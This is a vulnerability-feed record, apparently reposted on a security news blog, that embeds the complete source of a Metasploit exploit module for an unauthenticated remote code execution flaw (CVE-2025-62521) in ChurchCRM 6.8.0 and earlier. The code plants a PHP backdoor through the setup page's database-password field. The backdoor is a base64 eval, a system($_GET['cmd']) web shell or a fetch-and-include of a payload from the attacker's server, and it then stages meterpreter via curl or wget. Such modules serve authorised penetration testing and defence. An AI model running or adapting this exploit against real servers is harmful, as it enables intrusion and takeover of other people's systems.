{“lastseen”:”2026-02-16T19:28:04″,”description”:”This module exploits an unauthenticated remote code execution vulnerability in the installation process of ChurchCRM versions 6.8.0 and earlier. By sending a specially crafted POST request to the ‘setup’ page, an attacker can execute arbitrary commands…”,”published”:”2026-02-16T18:59:51″,”modified”:”2026-02-16T18:59:51″,”type”:”metasploit”,”title”:”ChurchCRM Unauthenticated RCE 6.8.0″,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-MULTI-HTTP-CHURCHCRM_INSTALL_UNAUTH_RCE-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-62521″],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Remote\\n Rank = NormalRanking\\n\\n include Msf::Exploit::Remote::HttpClient\\n include Msf::Exploit::CmdStager\\n include Msf::Exploit::Remote::HttpServer\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘ChurchCRM Unauthenticated RCE 6.8.0’,\\n ‘Description’ =\\u003e %q{\\n This module exploits an unauthenticated remote code execution\\n vulnerability in the installation process of ChurchCRM versions\\n 6.8.0 and earlier. By sending a specially crafted POST request to\\n the ‘setup’ page, an attacker can execute arbitrary commands on the\\n target server. This module uploads a meterpreter payload to the\\n target server and executes it, allowing for remote code execution.\\n },\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Author’ =\\u003e [‘LucasCsmt’],\\n ‘References’ =\\u003e [\\n [ ‘GHSA’, ‘m8jq-j3p9-2xf3’],\\n [ ‘CVE’, ‘2025-62521’]\\n ],\\n ‘Platform’ =\\u003e [‘linux’, ‘php’],\\n ‘Targets’ =\\u003e [\\n [\\n ‘Linux\/unix Command (CmdStager)’,\\n {\\n ‘Arch’ =\\u003e [ ARCH_X86, ARCH_X64 ],\\n ‘Platform’ =\\u003e [‘linux’],\\n ‘Type’ =\\u003e :nix_cmdstager,\\n ‘DefaultOptions’ =\\u003e {\\n ‘InitialAutoRunScript’ =\\u003e ‘post\/multi\/general\/execute COMMAND=\\”rm Include\/Config.php\\”‘\\n },\\n ‘CmdStagerFlavor’ =\\u003e [\\n ‘printf’, ‘echo’, ‘bourne’, ‘fetch’, ‘curl’, ‘wget’\\n ]\\n }\\n ],\\n [\\n ‘PHP (In-Memory)’,\\n {\\n ‘Arch’ =\\u003e [ ARCH_PHP ],\\n ‘Platform’ =\\u003e [‘php’],\\n ‘Type’ =\\u003e :php_memory,\\n ‘DefaultOptions’ =\\u003e {\\n ‘InitialAutoRunScript’ =\\u003e ‘post\/multi\/general\/execute COMMAND=\\”php -r \\\\\\”unlink(\\\\’Include\/Config.php\\\\’);\\\\\\”\\”‘\\n }\\n }\\n ],\\n [\\n ‘PHP (fetch)’,\\n {\\n ‘Arch’ =\\u003e [ ARCH_PHP ],\\n ‘Platform’ =\\u003e [‘php’],\\n ‘Type’ =\\u003e :php_fetch,\\n ‘DefaultOptions’ =\\u003e {\\n ‘InitialAutoRunScript’ =\\u003e ‘post\/multi\/general\/execute COMMAND=\\”php -r \\\\\\”unlink(\\\\’Include\/Config.php\\\\’);\\\\\\”\\”‘\\n }\\n }\\n ],\\n ],\\n ‘DisclosureDate’ =\\u003e ‘2025-12-17’,\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION],\\n ‘SideEffects’ =\\u003e [IOC_IN_LOGS, CONFIG_CHANGES]\\n }\\n )\\n )\\n\\n register_options(\\n [\\n OptString.new(‘TARGETURI’, [true, ‘Base path’, ‘\/’]),\\n ]\\n )\\n end\\n\\n # Check if the target is up by accessing the setup page\\n def check\\n print_status(‘Checking if the target is reachable…’)\\n\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘setup’, ‘\/’)\\n })\\n\\n unless res \\u0026\\u0026 (res.code == 301 || res.code == 200 || res.code == 302)\\n fail_with(Failure::Unreachable, ‘Target is not reachable’)\\n return Exploit::CheckCode::Unknown(‘Target setup page is inaccessible’)\\n end\\n\\n version = res.headers[‘CRM-VERSION’]\\n if version\\n print_status(\\”Found ChurchCRM version: #{version}\\”)\\n if Rex::Version.new(version) \\u003c= Rex::Version.new(‘6.8.0’)\\n return Exploit::CheckCode::Appears(\\”Vulnerable version #{version} detected via CRM-VERSION header.\\”)\\n else\\n return Exploit::CheckCode::Safe(\\”Version #{version} is not vulnerable.\\”)\\n end\\n end\\n\\n return Exploit::CheckCode::Appears\\n end\\n\\n # Build the payload that will be into the installation form\\n #\\n # @return : the payload\\n def build_payload\\n case target[‘Type’]\\n when :php_memory\\n b64_payload = Rex::Text.encode_base64(payload.encoded)\\n \\”#{rand_text_alpha(3)}’; eval(base64_decode(\\\\\\”#{b64_payload}\\\\\\”)); \/\/\\”\\n when :php_fetch\\n start_service\\n payload_name = ‘\/tmp\/’ + rand_text_alpha(5..10) + ‘.php’\\n \\”#{rand_text_alpha(3)}’; $f=’#{payload_name}’; file_put_contents($f, file_get_contents(‘#{get_uri}’)); register_shutdown_function(‘unlink’, $f); include($f); \/\/\\”\\n else\\n \\”#{rand_text_alpha(3)}’; system($_GET[‘cmd’]); \/\/\\”\\n end\\n end\\n\\n # Send a POST request to the setup page in order to execute commands\\n def alter_config\\n print_status(‘Injecting backdoor into Include\/Config.php via setup page…’)\\n\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘setup’, ‘\/’),\\n ‘vars_post’ =\\u003e {\\n ‘DB_SERVER_NAME’ =\\u003e rand_text_alpha(5..10),\\n ‘DB_SERVER_PORT’ =\\u003e ‘3306’,\\n ‘DB_NAME’ =\\u003e rand_text_alpha(5..10),\\n ‘DB_USER’ =\\u003e rand_text_alpha(5..8),\\n ‘DB_PASSWORD’ =\\u003e build_payload,\\n ‘ROOT_PATH’ =\\u003e ‘\/’,\\n ‘URL’ =\\u003e \\”http:\/\/#{rand_text_alpha(5..10)}.com\/\\”\\n }\\n })\\n\\n msg = ‘Failed to inject backdoor into Include\/Config.php. ‘ \\\\\\n ‘This can happen if the setup process has already been ‘ \\\\\\n ‘completed or if the target is not vulnerable.’\\n fail_with(Failure::UnexpectedReply, msg) unless res\\u0026.code == 200\\n end\\n\\n # Execute command on the target server\\n #\\n # @param cmd [String] the command to execute\\n def execute_command(cmd, _opts = {})\\n send_request_cgi({\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path),\\n ‘vars_get’ =\\u003e { ‘cmd’ =\\u003e cmd }\\n })\\n end\\n\\n # Execute PHP code on the target server in order to run the payload\\n def execute_php\\n print_status(‘Trying to execute the PHP payload’)\\n\\n send_request_cgi({\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path)\\n })\\n\\n print_good(‘PHP payload successfully executed’)\\n end\\n\\n # Upload the payload to the target server\\n def execute_linux\\n print_status(‘Uploading payload to the target server…’)\\n\\n execute_cmdstager(\\n linemax: 500,\\n nodelete: false,\\n background: true,\\n temp: ‘\/tmp’\\n )\\n\\n print_good(‘Payload uploaded successfully.’)\\n end\\n\\n # Handles the incoming HTTP request and serves the payload to the target.\\n def on_request_uri(cli, _request)\\n p = payload.encoded\\n send_response(cli, p, {\\n ‘Content-Type’ =\\u003e ‘application\/x-httpd-php’,\\n ‘Pragma’ =\\u003e ‘no-cache’\\n })\\n end\\n\\n def exploit\\n alter_config\\n\\n case target[‘Type’]\\n when :nix_cmdstager\\n execute_linux\\n else\\n execute_php\\n end\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/multi\/http\/churchcrm_install_unauth_rce.rb”,”cvss”:{“score”:10,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:C\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/exploit\/multi\/http\/churchcrm_install_unauth_rce\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-02-16T19:28:04″,”description”:”This module exploits an unauthenticated remote code execution vulnerability in the installation process of ChurchCRM versions 6.8.0 and earlier. By sending a specially crafted POST…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,36,12,169,13,7,11,5],"class_list":["post-41070","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-100","tag-exploit","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n